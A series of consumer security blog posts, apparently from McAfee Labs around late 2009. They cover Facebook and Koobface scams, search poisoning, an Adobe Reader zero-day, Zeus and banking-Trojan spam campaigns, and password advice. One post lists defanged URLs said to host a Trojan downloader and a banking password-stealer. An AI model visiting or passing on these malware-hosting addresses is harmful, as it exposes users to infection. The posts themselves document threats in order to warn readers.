I ran into a few strange IMs over the weekend. When I was not shoveling out my driveway from the 15 inches of snow that covered it I was logged into Facebook telling people about it…. It was then that I started receiving some VERY interesting IMs from a friend extolling the virtues of a clean colon (yep – you read that right):

This lead to the following questionable site, which had some very interesting comments on our SiteAdvisor site:

In short order I also received two more IMs. The first was a video (sound familiar???):

Which lead to a pretty darn good fake Facebook login page (note the SiteAdvisor warning on that page!):

The address this page was hosted on also had a VERY malicious reputation rating from our TrustedSource technology:

Last but not least I got one that included sales pricing for Christmas!!! It is the holidays and scammers certainly like using seasonal trends:

This lead to a really well done “replicas” site with brands such as Rolex, Tiffany, Breitling and others:

I contacted my friend (who was certainly NOT the sending IMs knowingly) and got them fixed up pretty quickly. Not surprisingly it was a Koobface variant on the local machine they were logging into Facebook from.

Facebook is one of the greatest and most popular sites on the Internet today. It has a huge user base, and as such is heavily targeted by scammers and malware writers. Make sure the computer you are accessing it from has up-to-date and properly configured security software!

Sadly, actress Brittany Murphy passed away over the weekend. With her unfortunate passing will come the inevitable web searches that lead Internet users to some potentially unsafe sights. This has been a well established trend throughout 2009. It is a sad reflection that malware authors and scammers will use these events as lures to distribute their warez and site links.

Over the weekend I first started seeing tweets relating to Brittany Murphy and began capturing images and running some searches. Very quickly these lead to the expected results:

The SiteAdvisor warning page on it is pretty clear on its intentions:

Some of the search phrases that are yielding very questionable results are:

Brittany Murphy dies
Brittany Murphy dead
Brittany Murphy husband
Brittany Murphy death hoax
Ashton Kutcher Brittany Murphy
Brittany Murphy 8 mile
Brittany Murphy luanne

Some of these had more than half the results on the first Google search page as flagged yellow or red by our SiteAdvisor technology.

The bad guys have been using celebrity deaths and natural disasters as a successful lure for most of this year. The words “Brittany” and “Murphy” along with related event words are trending very high in Google Trends and Tweetcloud currently. This means the bad guys will be using it as a lure because users are already searching for information on the subject. Make sure you are aware of the trend and stay one step ahead of them! Use SiteAdvisor and search safely!!

Adobe just posted a new Security Advisory (APSA09-07, CVE-2009-4324) for the latest critical vulnerability in Adobe Reader and Acrobat 9.2 (and earlier). The flaw lies within a JavaScript function specific to the PDF Reader. Adobe plans to release a patch by January 12, 2010, to resolve the issue. The zero day is already being exploited in targeted attacks. A Twitter post indicates that an exploit module was added to the MetaSploit framework, as well; so it’s only a matter of days until this exploit will become widespread–as the various exploit toolkits are “enhanced” with support for this latest vulnerability.

The screenshot below illustrates the inner workings of one such malicious PDF file, showing the JavaScript obfuscation layer on top of the actual exploit code.

McAfee customers are protected through both the DATs (as “Exploit-PDF.ag” in 5834) and through Gateway Anti-Malware (“BehavesLike.PDF.Suspicious.Z”). If you don’t really need JavaScript in PDF documents (and if you do, please leave a comment to this blog–we’re curious to know), you can mitigate this issue until the patch is available next year by disabling JavaScript in Adobe Reader and Acrobat as described in the Adobe Security Advisory.

As outlined in our recent report Mapping the Mal Web, the People’s Republic of China’s top-level domain (.cn) is currently one of the riskiest domain names to surf due to numerous malware downloads and other risky sites. However, this state of affairs may now change for the better:

On December 11 the China Internet Network Information Center (CNNIC), the state network information center of China, released an update regarding its auditing of domain name registrations. As of today, domain name applicants must submit a formal paper-based application when making an online application to the registrar. This includes the original application form with business seal, company business license, and a photocopy of the ID.

This change will make the .cn domain very unattractive for criminals and fraudsters who are looking for domains for which they can register anonymously, preferably paying with stolen credit card information. This would be a great step in making the domain name space of .cn a safer place. And if these measure are implemented as announced, it would in fact make China a leading example in the fight agains fraudsters on the Internet.

I do hope that one small part of the announcement suffered just a bit in translation:

“3. From the day of the submission of online application, if CNNIC does not receive the formal paper-based application material within 5 days or the application material auditing is not qualified, the domain name to be applied will be deleted.”

I hope this means the application, not the domain, will be deleted after being in service for just five days. If not, this has the potential to become “Domain Tasting 2.0.”

The United States is still a safe haven for spammers. With U.S. anti-spam legislation doing very little to thwart spammers and the McColo takedown having only a short-term effect, we have found that due to low-cost and reliable hosting and anonymous domain registration, our country remains the world’s top source for spam.

The December report also reveals:

• “Twitter job” spam, which has been going on for months, is on the rise. It’s a scam that tries to get people to create Twitter accounts and send spam to their followers for money.
• This season’s Christmas-themed malware is focused on the recession, advertising fake luxury goods and brands that are “on sale” through email
• One year after the McColo ISP shutdown, spam has risen beyond the levels before McColo was taken offline
• January 1, 2010, marks the sixth anniversary of the CAN-SPAM Act of 2003, but spam levels have reached record levels in the six years since the legislation passed

Read the report in its entirety here.

On December 1st McAfee Labs detected an outbreak of a spam mail pretending to be from the CDC and using the H1N1 virus to facilitate the distribution of a Zeus Trojan executable. The email claims that the CDC is requiring all people to fill out a “vaccination profile” online.

This email has been associated with the following subjects, but there are likely to be more as the campaign progresses:

Governmental registration program on the H1N1 vaccination
State Vaccination H1N1 Program
Your personal Vaccination Profile
Create your personal Vaccination Profile
State Vaccination Program
Creation of personal Vaccination Profile
Instructions on creation of your personal Vaccination Profile
Creation of your personal Vaccination Profile

These emails contain a url that points to a website which urges the victim to download a vaccination profile archive:

The link is an executable that installs a VERY recent Zeus trojan variant. Zeus is an easy-to-use tool for constructing trojans and has been associated with numerous botnets. As of the time of this writing, McAfee is among only a handful of AV engines that detects this strain (7/41 engines detected it according to VirusTotal, and McAfee had 2 of those 7 engines).

The domains in the email were registered or updated a week before the campaign began. The whois information associated with the domains indicate that most of them were registered with a Belgium registrar at active24.be.

The DNS servers that are authoritative for the spam domains were purchased from a Chinese registrar “Xin Net Technologies”, but the DNS servers themselves are being hosted from locations in the US, Japan and Hong Kong. We even see some of the dns servers being used as previously having been associated with sending spam mail for the Cutwail botnet, which has been known to use the Zeus Trojan. This could indicate the possibility that some the dns servers themselves may simply be infected hosts.

These hostnames are associated with 135 distinct IP addresses associated with the websites hosting the Trojan, which stem from all over the world and appear to be dsl accounts.

The primary countries hosting the websites at the time of this writing are in Colombia, Brazil, India, Malaysia, Chile and Argentina.

Stay updated and stay safe!!

National unemployment rates over 10% and the pressures of the holiday shopping season make for a dangerous cocktail that the cyber criminals can take advantage of.  Fears of not being able to pay the monthly mortgage, car payments, backed up bills, and providing for your children for the holidays have put many people into situations that they never thought they would find themselves in. This has caused many to become desperate and vulnerable as the try to make ends meet.  Cyber criminals are always looking to take advantage of vulnerable situations as a way to dupe people into giving up your sensitive information.  In addition to obviously being criminals, I always say that cyber criminals are also great marketers!

To that point, be on the lookout for many different types of scams this holiday season (check out our recently published “12 Scams of Christmas“) including get rich quick schemes and work from home opportunities that are really just covers for phishing scams or attempts to inject malware onto your computer.

We are monitoring a couple such scams arriving via email which are linking off to Twitter updates or free blogging services like Google’s Blogspot:

As the holiday season progresses, we will see more of these types of scams popping up with themes ranging from holiday sales and rebate opportunities to holiday e-cards which actually install malicious applications instead of the holiday card!.  One bit of advice that we ask users to follow is that if you are interested in the latest deals and bargains being offered by your favorite online retailer this holiday season, go to the web site directly by typing their web site into your browser.  Do not click on a link in an email or instant message to get you there because the link might actually be masked to go to a lookalike site setup by cyber criminals to steal your personal information.  If the offer that arrived in your inbox is legitimate it will be honored on the web site if you browse there manually as opposed to clicking a link that arrived in your inbox.

Have a safe and malware free holiday season!

Security breaches, laptop theft, and identity theft happen all the time, and these crimes increase every year. The need for people to become more aware of their digital presence and the threats surrounding it is vital.

The pace at which these threats increase is much faster than our awareness grows, making a bad situation. One way to improve matters is to implement security-awareness programs in colleges and universities.

Why choose colleges? Higher education institutions are an ideal platform for spreading security awareness because they produce so much of our future workforce. With computers everywhere in businesses, it’s essential that these graduates learn about the invisible threats that face them and their employers’ information.

Another benefit of focusing on colleges and universities is that this environment provides both a very good learning atmosphere and people working in many fields. Thus a security-awareness program will benefit not only students in the computer or business fields, but also in medical, environmental, media, and many more disciplines.

Hot Topic: Identity Theft
College students are attractive targets for identity thieves because they generally have clean credit records, allowing thieves to easily take out loans in their names. Many students may also not realize the potential for fraud and do not guard their personal information as closely as they should. Student’s social security numbers, email IDs, and addresses may be listed on everything from identification cards to report cards, which this information readily available to enterprising thieves. Universities and colleges have also come under attack from hackers in recent years, due to the value of the information they store.

What are some aspects of identity theft? Here are some figures from a 2009 study by Javelin Strategy & Research Center:

• Identity theft is on the rise, affecting almost 10 million victims in 2008. That’s a 22 percent increase from 2007.
• Victims are spending less money to correct the damage from identity theft. The mean cost per victim is $500, and most victims pay nothing due to zero-liability fraud-protection programs offered by their financial institutions.
• 71 percent of fraud happens within one week of the theft of a victim’s personal data
• Low-tech methods for stealing personal information are still the most popular for identity thieves. Stolen wallets and physical documents accounted for 43 percent of all identity theft, while online methods accounted for only 11 percent.

Types of Identity Theft
Identity theft can happen to anyone, and it can come in all shapes and sizes. For example, your credit card number could be stolen and used to make online purchases, a thief could impersonate you to open up a loan in your name, a felon could commit a crime and pretend to be you when caught, or someone could use your personal information to apply for a job.

Here’s a chart describing kinds of identity theft, based on Federal Trade Commission complaint data:

Students should protect themselves by detecting and resolving identity thefts. Here are some general tips to minimize the risk of identity theft:

• Check credit card statements regularly. Students should examine their financial statements at least once per month for any unusual activity. A credit-monitoring service can be a valuable tool in fighting identity theft, as it would alert them if any new accounts are opened in their names.
• Use strong passwords. If remembering many passwords is too difficult, create a few strong ones that include numbers, capital letters, and special characters such as ^ or *. Most important, do not share your passwords, debit or credit card PINs, or leave lying about any papers or unlocked computers with personal information.
• Protect your computer. It a good practice to enable all security features and keep your anti-virus and spyware protection up to date. Use a password-enabled lock (such as a screen saver) on your computer in case you leave it running while you are not present.
• Don’t swallow the bait. College students, though technically savvy, can fall victim to scams. Beware of phishing attempts that ask you to update personal data such as social security numbers and bank account information. The senders are trying to steal your data to commit fraud. Students should also watch out for fake anti-virus tools that claim your computer is infected and insist you run a “scan” to find malware. Use McAfee SiteAdvisor to check if you are surfing safely.

No matter how sophisticated security gets, we still need to handle the basics properly. One of the most basic tasks is to create and use secure passwords. You need them to log onto your computer, reach internal applications, and enter just about every website you visit. They are pervasive in our connected world.

But how many of us give any real thought to how secure our passwords are? Because we use them so often, we’re tempted to reuse the same one over and over again. However, as your mother might say, that’s a poor decision. Here are pros and cons of several common password techniques, and a simple-to-remember method that is both easy for you and hard for hackers.

Frequency and complexity
Our decisions about passwords are often some balance of frequency and complexity. The more frequently we use a password, the easier it is to remember it; and the more complex the password is, the less likely we will be able to remember it. This difficulty leads many people to use the same password for all their online accounts. Banking, auction, and social networking sites could have the same password for the same account name. In such a situation a hacker who compromises a single website can get the username and password for all of your accounts. It is important for people to remember that their website passwords are owned by that website, not by the individuals who entered them. Thus giving a website a password that accesses other accounts is not the best way to maintain security.

Users should avoid any password that can be cracked by a dictionary attack. If your password can be found in an unabridged dictionary, then it can be “guessed” by having a computer program try them all out. “123456” is not adequate to avoid a dictionary attack because it is the most commonly used password in existence. Using profanity may make talking about the password unacceptable in polite conversation, but that social boundary will not stop someone willing to breaking the law to steal your identity.

Password habits
Most people’s password habits fall into one of three categories:

• The global password. Many people use the same password everywhere. This is the worst password method; it means that someone who hacks a website that you bought something from years ago can now get into all your most frequently used accounts.
• The short list of passwords. Others create a hierarchical list of passwords that they reuse. This allows them to use their most complex password for financial websites, a simpler password for websites where items are purchased, and another password for social networking websites. This is exponentially better than the single global password, but exponentially better than “worst” is still not good.
• The black book of passwords. Some people choose a unique password for every website they visit, but because of the huge list of passwords they need to remember, they all are written on a pad of paper kept near the computer. This is not only unwieldy and not flexible (if you go on vacation and forget it), but you can lose the list or have it stolen by someone who gains brief access to your office or computer. Many corporate environments that force people to constantly change their passwords are littered with passwords on sticky notes or on paper in a drawer that is accessible by coworkers, cleaners, or burglars.

Creating your password algorithm
In creating passwords we want to maximize complexity and eliminate repeating passwords without adding any additional stress to our brains. To do this we need an internal algorithm that will generate a unique, difficult-to-guess password for every website we visit. The algorithm needs to be repeatable, so that remembering the passwords is not important: All we need to remember is the algorithm that generates the password. Thus we need to take something about to ourselves, add something unique about the website in question, and modify that information so that the algorithm is not obvious to anyone looking at the password.

Here is an example of a password for mcafee.com.

My token: light
The website: mcafee.com
The password: 123l1ghTjdqr33^!

In spite of the password’s complexity, the algorithm here is relatively simple. We start with “123,” and then add the word “light” with the “i” replaced with the number 1 and a capital “T” at the end. We add “jdqr33,” the letters (and numbers) above the word “mcafee” on my keyboard. We finish off with a bang—“^!”—to make sure we include some special characters.

Here’s another password with the same token and website:

The password: LlIiFCM999gh+

That’s the “li” in “light,” but with an upper and lowercase of each, then capitalized consonants from “mcafee” written backward, a few 9’s, and a “ght” with the “t” replaced by a plus sign.

Your algorithm can be anything you want, but you should choose one that includes numbers, letters (both capital and lowercase), as well as special characters. Some password validation algorithms don’t accept special characters, and others require you to start with a letter. These can be your second and third tries if you don’t get it on the first. Having a good password algorithm prevents someone from getting one password and using it on all your accounts, it also makes your password hard to guess, and it doesn’t require you to carry around a list of passwords.

In the case where your office administrator forces you to change your password frequently, you need only to write down the website token instead of the full password. So even if people find your little black book of passwords, they’ll be lost without the algorithm.

It is the time of year to get together with family and friends, and that often involves flying. So, how about a promotional airline ticket for just $1?

That sounds like an irresistable idea! Though it also sounds too good to be true. As you can imagine, there is something wrong here. Instead of flying for a buck, you may end up with several fewer hundred dollars in your bank account.

This example is the most recent seasonal spam targeting Brazilians. In the image below you can see the pitch.

When you click on the image, which is hosted at hxxp://dhroot.hpg.com.br/images/danosse.jpg, you’ll follow a link that will attempt to download a Trojan from hxxp://www.medcitybuilders.com/plugins/system/[REMOVED]/. This Trojan is a downloader that will copy a password-stealing malware that targets the customers of Brazilian banks. The malware is currently hosted at hxxp://www.radfahrschule.at/html/modules/PagEd/browsepics/[REMOVED].

In Brazil we say “there is no such thing as free dinner.” In the States there’s no free lunch. In this case we can also see that there are no free air tickets.

The idea of malware distributors abusing Google Trends is not new. The bad guys have once again demonstrated that they, too, can take advantage of Google Trends. This time their target is Big Bird’s birthday.

It’s not new that the Google logo includes Big Bird; it does so on special occasions. The Google logo clearly shows Today’s Hot Trends, and that’s a target for malware writers.

This year is the fortieth anniversary of Sesame Street, and the bad guys have begun their attack. Searching for keywords such as Big Bird’s birthday and Big Bird on Google displays pages with compromised sites.

Watch the video below, which shows how rogue anti-spyware attacks a system.

The video shows that the malware is literally pushed onto the system regardless of what the user does. In the past we have seen malware injected into a compromised site through exploits and iframes. Today, malware often attacks only from a search-results page. In certain attacks, if a user directly accesses a compromised site, then there’s no redirection to a payload and no infection.

Users have no idea what they will get by clicking on search results, which now are like a virtual minefield; you never know what will happen next. McAfee strives to protect users from such attacks through its free SiteAdvisor technology. It warns users with green, yellow, and red alerts next to each search result. You can minimize your risk of attack by using SiteAdvisor and paying attention to what you are clicking on.

It didn’t take long for spammers to change from Halloween lures to spam and malware. They’ve already moved to the Christmas season, and we have started to see emails from the Cutwail botnet that are using a Christmas theme to trick users into visiting malicious websites. Spammers must be trying to beat retailers to the advertising punch this year.

The campaign we are currently monitoring uses subject lines that try to get users to visit websites selling fake jewelry and Rolexes. These spammers aren’t cheap either. Only the best will do for their customers–brands such as Cartier, Gucci, and Tag Heuer are on “sale” to all who would be fooled.

They even went so far as to include a logo to the Better Business Bureau and a “Hacker Safe” image on their site. Ironic, isn’t it?

This and similar sites are part of a campaign to steal your credit card information and identity. With the holiday shopping season rushing toward us, be sure to exercise extreme diligence regarding businesses you give your sensitive information to. The tricks that criminals use during the holiday season will be difficult to discern from legitimate marketing.

How can you stay safe? Avoid clicking links in emails. If you want to visit your favorite retail site to check out their holiday specials, type the address directly into the address bar. Most legitimate sites will not force you to click a link within an email to take advantage of their latest deals.

We have already discussed the Facebook phishing campaign. Now the scammers are using the phishing campaign not just for spamming but also for a “cocktail” attack.

• The scammers have targeted Facebook, telling them that the Facebook account passwords have been changed.
• The malware downloads a keylogger to collect credit card numbers, social security number, and other passwords from the victims’ machines.
• The malware pushes a fake security product, which disables many applications, such as Notepad, Wordpad, etc., until the bad guys are paid.

This phishing campaign attempts to convince users that the email comes from Facebook by forging the From: address.

The mail claims the password has been changed and that it is available in the attached zip file. Once the victims unzip it, they see a file with a spreadsheet icon. When the victim tries to open the file to look for a password, it drops the payload and deletes itself. Once the malware is installed, it establishes a connection to the attacker’s server through the HTTP port and attempts to download more payloads onto the infected machine.

The malware also downloads a keylogger and runs it covertly. The second attack hunts for any keystroke so that it can collect information such as the login ID password, credit card and socialsSecurity numbers, etc. The malware sends the data to a remote server through a backdoor it creates. But this is not yet the end of the game.

While this data theft occurs, the malware also tries to download a fake security product. The rogue application that enters through the backdoor will be covertly installed on the victim’s machine. Once installed, the fake product runs a service that kills almost all open applications: Notepad, Calculator, Registry Editor, Task Manager, and others. (It does not kill Internet Explorer because it needs IE to to communicate with the malware server.) After killing these apps, the malware shows a fake alert–claiming the application you’re trying to open is being used to connect to a malware server. (See image below.)

Phishing campaigns on social networking sites are not new. Scammers are not satisfied only pushing spam to sell “Canadian” pills. Now they also want to sell fake security products, and they need all of our passwords. With McAfee coverage, you’ll be protected against this cocktail attack.

I have previously blogged that some of the most common techniques scammers and cybercriminals use are news events and holidays. Balloon Boy and the Windows 7 Launch are good examples. My colleague Sam Masiello’s blog on President Barack Obama’s Nobel Prize is another excellent example. With Halloween approaching rapidly, the tricks are already knocking on your inbox and at your browser’s window.

As usual, although the lure differs depending upon the news or event, these tricks lead to the usual suspects–fake products and pharmacy spam. Just think of it: Would you like some candy or Viagra for Halloween?

Here’s another:

And our favorite with a holiday spin:

Here are a few message subjects to fear:

Approved meds available without recipe!
A HORRIFYING HALLOWEEN SALE!
ONLY TILL 31OCTOBER HALLOWEEN SALE: 40% OFF ALL OUR SOFT USE THIS DISCOUNT CODE: HALL-6666
Biggest deal this halloween
Low prices for big enlargement
Halloween discount
Annual Halloween Sale

While searching for “Halloween screensavers,” I ran across more than a few questionable websites. The following was the fifth entry on the first Google results page! No worries, we already had it flagged through our SiteAdvisor technology:

Keep your security updated and search safely this week!

I’m writing this blog to demonstrate how the bad guys are getting better each day–or not, depending of your point of view.

Once again our topic is Brazilian malware authors. Yes, the dumb ones I keep running up against.

One of the recent versions of the PWS-Banker Trojan being distributed via spam has an interesting feature. First, let’s recall how those malwares usually spread:

This version of PWS-Banker, besides grabbing passwords and screenshots, will also download Microsoft MSN Messenger. Or an app that at least looks like Messenger.

When you enter your username and password and click enter, the app will exit. But, in the background it will message all your contacts on your behalf, sending nice notes with links.

Now, let’s play The Seven Errors Game. Below are two MSN Messenger login screens. (One is in Portuguese and the other is in English, but that is not one of the errors.)

and

Unfortunately I am not really being fair with you, because only one of the seven errors can be seen visually. The other six are found only by behavioral analysis.

Here are the answers, starting from the top and working downward.

1) The windows are different, and you can see the minimize/maximize/close buttons are different
2) The help icon is the same, but when you click on it, no option is clickable
3) The dropbox on the login name doesn’t work
4) The status drop box doesn’t work
5,6,7) The check boxes don’t work

Next time something unexpected pops up on your screen, don’t enter your data right away. Check and recheck before you believe it’s real.

In her recent blog Joanna Rutkowska describes a proof-of-concept code to attack Truecrypt system disk encryption. The blog also mentions “the concept behind the Evil Maid Attack is neither new, nor l33t in any way.” However, because the POC is now published, we expect script kiddies to jump on this opportunity and tweak this code to their advantage.

As always, to protect our customers we looked into a possible AV detection mechanism to alert users in case the system is compromised. Obviously an AV cannot prevent an Evil Maid attack, but alerting a user on the first reboot after such an infection can go a long way in preventing data loss.

We now detect this proof-of-concept code as Trojan PWS-EvilMaid!demo, due to its password-stealing capabilities. We will watch for any future variants that follow this trend. Here is the screenshot of McAfee alerting the user once the machine is infected. We recommend you reinstall Truecrypt if you see this detection.

Protect what you value!

It’s bad enough that we are subjected to apparently fake child-peril balloon shenanigans in the news–and I guess this was only to be expected–but it seems that spammers and scammers have latched onto Balloon Boy as a lure to sell pharmaceuticals. Given the amount of news the original story of Falcon Heene and the runaway balloon produced and the subsequent news around the possible scam, it was too attractive a lure to be ignored.

As usual, though, despite the novelty of the news event itself, the spams lead to the same types of stuff:

All leading to the same fake “Canadian” pharmacy sites. (The Chinese registrant info for this one was only a few days old!):

Common subjects to beware of include:

Little boy trapped in balloon
Boy-balloon-madness
balloon kid’s full story
Balloon boy died
Little boy trapped in balloon
Balloon boy died
balloon kid’s full story
Boy-balloon-madness
Drama with balloon(exclusive)

Be careful what you click, and mind the news. It is often the lure the spammers look for.

My thanks to colleagues Adam Wosotowsky and Sam Masiello for the samples.

The release of Microsoft’s next major operating system, Windows 7, is at hand. It’s timely to remind everyone that we have seen Windows 7 spam for a few months. Anything on this scale from Microsoft is too big a lure for spammers and cybercriminals to ignore. (I would be stunned if they didn’t take advantage.)

We’ve seen subjects that include:

Microsoft Windows 7 special offers
Windows 7 SP 2
Windows 7 FAQ on release
Today’s Special Gateway Laptop + NEW Windows 7 & More Electronics Deals
Windows7 ultimate 86% off
Windows7 ultimate 57% off

We at McAfee Labs have noticed these throughout both September and October–with spikes as high as 1.88 percent of total spam. That might sound like a small number, but when you consider that daily spam volumes can reach 160 billion messages, it is not insignificant.

As always, stay aware of the trends the scams and spammers use to lure you in. Be safe and watch what you click!

I thank my colleague Adam Wosotowsky for the background data!

In Las Vegas during this month’s McAfee FOCUS 09 conference, I listened to various speakers in the Threats and Trends track. They explained how cybercrime was now managed by individuals driving their groups according to highly professional business models.

One of the most interesting talks was made by my colleague Dirk Kolberg, who presented on Innovative Marketing, a Ukrainian scareware company the Federal Trade Commission accused of spreading some massive “scareware” schemes–alarming messages falsely claimed that scans had detected viruses, spyware, and illegal pornography on consumers’ computers. The U.S. District Court for the District of Maryland approved the FTC’s request to call a halt to the company’s activities and freeze the assets of those behind the scams.

Explaining that Innovative has more than 600 employees in real offices, subsidiaries in various countries such as India, Poland, Canada, United States, and Argentina and complete with customer-calling centers, Dirk said the company received approximately 4.5 million order IDs in 11 months or, in other words, US$180 million dollars (at $40 each). Technical support, a professional website, and LinkedIn profiles for the company and its staff provided what appears to be a legitimate front. Following its legal troubles, it is now a defunct company; yet many employees have joined a new entity that has the same production targets.

The same day, my colleague Dmitri Alperovitch gave an overview of the Eastern European countries’ cybercrime landscape. Like Dirk, Dmitri demonstrated the high level of organization within the cybercrime industry. The first example came from Romania, where the Bogdan Païu carding gang operated. Members were caught in the act and arrested in 2006 after they emptied the accounts of several hundred citizens of Brazil, Spain, Italy, and the United States.

Well organized and equipped with sophisticated cloning devices, they received the personal data from Russian accomplices. Counterfeiters used the money diverted from ATMs on striptease entertainment clubs, luxury cars, luxury hotel accommodation, food, and fine drinks.

In the second part of his talk, Dmitri presented an events timeline of the Eastern European carding underground:

He discussed CarderPlanet, and its hierarchical structure set up like a mafia (and the source for the following image: NICSA-FBI-SSA, Michael J. McKeown )

CarderPlanet was shut down in 2004 and the FTC complaint for the injunction against IMU dates from December 2008, but cybercrime gangs will always rise from their ashes.

Around Kyiv, the making of fake antivirus software still flourishes. The latest statistics on rogue antivirus–presented by Craig Schmugar and Anthony Bettini in their session–are unequivocal.

The last piece of news on carding and phishing demonstrates the size and the worldwide organization of the actual cybercrime gangs.

• In France, about 70 individuals were recently indicted. They were “mules” who, via Western Union, sent the money they embezzled to the Ukraine and Russia.
• In France, a gang of Slovakian gangsters from Britain was under investigation after bank cards were used to take more than $480,000 from cash machines in northern France. Up to 50 Eastern Europeans descended on Calais from Dover early on September 11 before emptying cash points across the region. 34 were arrested, all using Barclays Bank cards. According to the police in Lille, a “Mafia-style” mastermind had used dozens of mules to empty machines at a range of banks.
• This month in the United States, the FBI announced the results of the Operation Phish Phry. After a two-year investigation, more than 50 individuals in California, Nevada, and North Carolina and nearly 50 Egyptian citizens have been charged with crimes including computer fraud, conspiracy to commit bank fraud, money laundering, and aggravated identify theft. The gang victimized hundreds and possibly thousands of account holders by stealing their financial information and using it to transfer about $1.5 million to bogus accounts they controlled. Here, too, the group was very organized, as demonstrated by a chart created with i2 Analyst’s Notebook by Gary Warner.

All these examples support the position that Dave DeWalt discussed during Wednesday’s general session: “The bad guys are getting organized. This is not the hacker in your basement. We’re talking about organized crime, organized terrorism, and organized warfare,” DeWalt said. Identity theft, phishing, or fake alerts go through the Net. Faced with these threats, large organizations deploy solutions from multiple vendors because the truth is that no single vendor can meet all of their security and compliance needs. But today’s security threats and economic challenges demand that products from multiple vendors interoperate to provide better protection, reduce operational costs, and streamline the compliance lifecycle. This is why at FOCUS 09 DeWalt also reaffirmed his support of the McAfee Security Innovation Alliance (SIA). He described it as the “NATO” of security software, a call for a universal architecture for security standards and confirmed that McAfee is focused on improving partnerships and establishing an extended broader community through this innovative technology-partnering program.

Spammers are always looking for techniques that can beat the spam filters. We have seen various techniques for spamming–like obfuscating words, embedding text in images, spoofing urls, abusing social networking sites, and many other techniques for spam to avoid getting caught.

One of these techniques is ASCII art, an artful way of representing an image using text characters. These representations first appeared long ago to overcome the limitations of computers for displaying graphics.

Example:

______    _____   ______    _       _____    _____     ___
| ___ \  |  ___|  | ___ \  | |     |_   _|  /  __ \   / _ \
| |_/ /  | |__    | |_/ /  | |       | |    | /  \/  / /_\ \
|    /   |  __|   |  __/   | |       | |    | |      |  _  |
| |\ \   | |___   | |      | |____  _| |_   | \__/\  | | | |
\_| \_|  \____/   \_|      \_____/  \___/    \____/  \_| |_/

The clever thing is that each line has some random characters with _ and | characters, which do not resemble any part of the word replica. If we take the entire picture into consideration, though, our eyes can read it as a word. The spammers try to take advantage of this to pass through spam filters and deliver their intended message.

Not only are the words represented in this manner but even URLs can be displayed in this way to avoid the blacklisting of the domains.

ASCII art spam is not limited to only nonword characters. It can be numbers, alphabets, and combinations of both, which can make things even worse for certain spam filters:

dP""b8  88     db     88     88  dP"Y8
dP      88    dPYb    88     88 `bo
Yb      88   dP__Yb   88     88   `Y8b
 YboodP 88  dP""""Yb  88ood8 88  8bodP'

In the email above we can see that the spammer is advertising a pharmacy product without using the respective words, yet still successfully conveys the message.

We saw this spam technique some time back, but it had died off. Recently, however, we have seen an increase. McAfee customers are protected from this type of spamming technique.

Surrounded by a network of neon lights across the ceiling, walls of computer screens lit with grave headlines regarding our country’s digital dependence–drinking water, sewer systems, banks, government systems, all vulnerable to an electrical grid outage–I introduced my wife and my sixteen-year-old daughter to our latest McAfee endeavor, an exhibit contributor in the new International Spy Museum exhibit “Weapons of Mass Disruption.”

Yes, you read that correctly. Your humble narrator is part of a museum exhibit.

Nestled on the corner of 8th and F Streets in Washington, D.C., the International Spy Museum has become a must-see in our nation’s capital. It speaks to our country’s tales of espionage and the ultimate currency, intelligence. Never has a place been better suited to educate its visitors about the cybersecurity threats facing our government, our businesses, and you and me.

As former national intelligence director Admiral Michael McConnell mentioned during the exhibit’s opening event, the Internet has created an unprecedented level of vulnerability.

These threats, which could bowl you over in their magnitude and frequency, are constantly evolving, morphing into ever-changing but equally lethal pieces of malware–as diverse and fluid as Web 2.0 itself. In that stuff is our office, littered with Red Bull and Twinkies, where I and many other McAfee Labs researchers garner an understanding of the dark side of cyberspace activity. You know the saying: Keep your friends close but your enemies closer. It is this insight that yields information on breaking threats and a more holistic understanding of the black-hatted enemy.

So consider again the computer wall’s grave headlines in the exhibit: “The Pentagon’s IT system is probed 360 million times a day. Twitter crashed as a result of a denial of service attack against a Georgian proponent. Is our air traffic control system protected?”

The exhibit shouts the theme that we as an industry live and that I shared during my contribution interview. The threat is real. Even my daughter got a kick out of it.

Cybercriminals are taking advantage of American concerns about healthcare by flooding the Internet with spam. According to our October Spam Report, 70 percent of global spam is now “Canadian” pharmacy spam, which takes advantage of fears of swine flu and the rising costs of Medicare and pharmaceuticals.

Spammers generate more than 150 billion spam messages daily; that’s enough to send everyone in the world more than 30 emails every day (including people without computers). Nearly 19 out of every 20 emails are spam, and cybercriminals are growing more sophisticated with their attacks. No brands seem to be safe, and this month’s report analyzes how spammers are abusing the brands of Monopoly, The Hollywood Reporter, and even the Jewish organization Chabad to distribute malware.

The report can be downloaded here.

The use of social engineering to grab attention of recipients and to deliver malware is not something novel. The latest trend in spreading malware is to manipulate a happening celebrity story, disaster or other high profile news event. The threat could be delivered as emails or poisoned search engine results which leads to malware. In the past, we have come across innumerable incidents like Michael Jackson demise or Benazir Bhutto assassination used as an arena to spread malware. Lately, we have observed an increase in the number of OLE files being used as targeted attacks against various high profile users.

The exploit and lure claims to contain information on the Pakistani Air Force and arrives via email as a PowerPoint document attachment. When an unsuspecting user having a vulnerable version of PowerPoint launches the document, the vulnerability is exploited and the malicious payload is executed.

The vulnerability is with a malformed record within PowerPoint which can be exploited to execute malicious code. The shellcode makes use of the Process Environment Block (PEB) approach to determine the kernel32.dll base address as shown in the figure below.

Upon executing the file in a vulnerable version of PowerPoint, the shellcode decrypts itself and executes the malicious binary.

The malicious PPT file is exploiting an older vulnerability which was patched by Microsoft in ms06-028 bulletin. This attack is detected with the current DATS as Exploit-PPT.h and the dropped malicious executable is detected as BackDoor-EFB.

Today Avert Labs has published a new research paper, “Inside the Password-Stealing Business: the Who and How of Identity Theft.” With so many financial transactions occurring online today, stealing passwords to banks and other accounts is an irresistible attraction for cybercriminals. Thieves around the world use Trojans and other malware to grab user credentials, which they can resell to their crooked clientele while supporting their own illegal businesses.

Our report uncovers technical details on the capabilities, level of sophistication, and inner workings of the most infamous contemporary password-stealing malware families such as Zbot, Sinowal, and Steam Stealer. We also discuss the prevalence of such malware, distribution channels, how criminals keep up with the changes banks make to keep transactions secure, and how they exploit today’s economic climate. Offering illegal “work at home” opportunities to desperate job seekers is one way criminals lure the unsuspecting into furthering their illegal activities.

You’ll find our report here in English and eight more languages.

Want to peek inside another one of these infamous password thieves? Let’s have a look at SilentBanker.

